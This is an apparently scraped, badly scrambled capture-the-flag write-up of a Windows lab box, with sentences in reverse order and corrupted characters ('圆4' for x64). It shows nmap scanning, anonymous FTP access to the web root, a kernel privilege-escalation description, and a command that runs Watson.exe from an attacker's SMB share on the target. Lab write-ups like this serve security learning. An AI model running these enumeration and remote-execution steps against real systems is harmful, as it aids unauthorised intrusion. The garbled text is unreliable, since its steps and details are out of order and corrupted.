Description: Kernel-mode drivers load unspecified keyboard layers improperly, which result in arbitrary code execution in the kernel. I’ll remember from the systeminfo output that it was a 圆4 processor, but that the OS was x86:Ĭ:\Windows\Microsoft.NET\Framework> \\10.10.14.14\share\Watson.exe \\10.10.14.14\share\Watson.exe This let’s me set the architecture (x86 vs 圆4) for the output binary. Next, I’ll go to Build –> Configuration Manager. I’ll set it to 3.5 since that’s the latest that’s installed on target. I’ll make sure Application is selected on the menu on the left, and there I should be able to set the “Target framework”: I’ll go to the Visual Studio menu and open Project -> Watson Properties. I’ll download the zip from the GitHub page and double click Watson.sln in my Windows VM to open it in Visual Studio. Watson is a C# implementation of a tool to quickly identify missing software patches for local privesc vulnerabilities. I can do that with a registry query:Ĭ:\Windows\Microsoft.NET\Framework> dir /A:D dir /A:Dĭirectory of c:\Windows\Microsoft.NET\Framework NET Versionsįirst I need to find out what. I’ll use Watson to check for potential vulnerabilities / exploits. This is likely vulnerable to many kernel exploits. : Intel(R) PRO/1000 MT Network Connection Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Input Locale: en-us English (United States) : 圆4 Family 6 Model 63 Stepping 2 GenuineIntel ~2300 MhzīIOS Version: Phoenix Technologies LTD 6.00, One other thing I will observe - If I look in burp at the http response, I see the following header: loads the same page as the root url, and welcome.png is the image on that page. I can also add more weight to this theory by checking the two files from ftp, and confirming they exist on the web server. I could kick off a gobuster to look for more paths, but given my theory about the web root being accessible via ftp, I’ll skip gobuster in favor of attacking that. I can log in with username “anonymous” and an empty password. Not much to enumerate beyond what was in the nmap script results. The files in ftp picked up by nmap look a lot like the web root on a Windows host.Right away I notice a couple interesting things: Nmap done: 1 IP address (1 host up) scanned in 7.25 seconds Service Info: OS: Windows CPE: cpe:/o:microsoft:windows | ftp-anon: Anonymous FTP login allowed (FTP code 230) Nmap done: 1 IP address (1 host up) scanned in 13.44 nmap -sV -sC -p 21,80 -oA scans/nmap-scripts 10.10.10.5
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |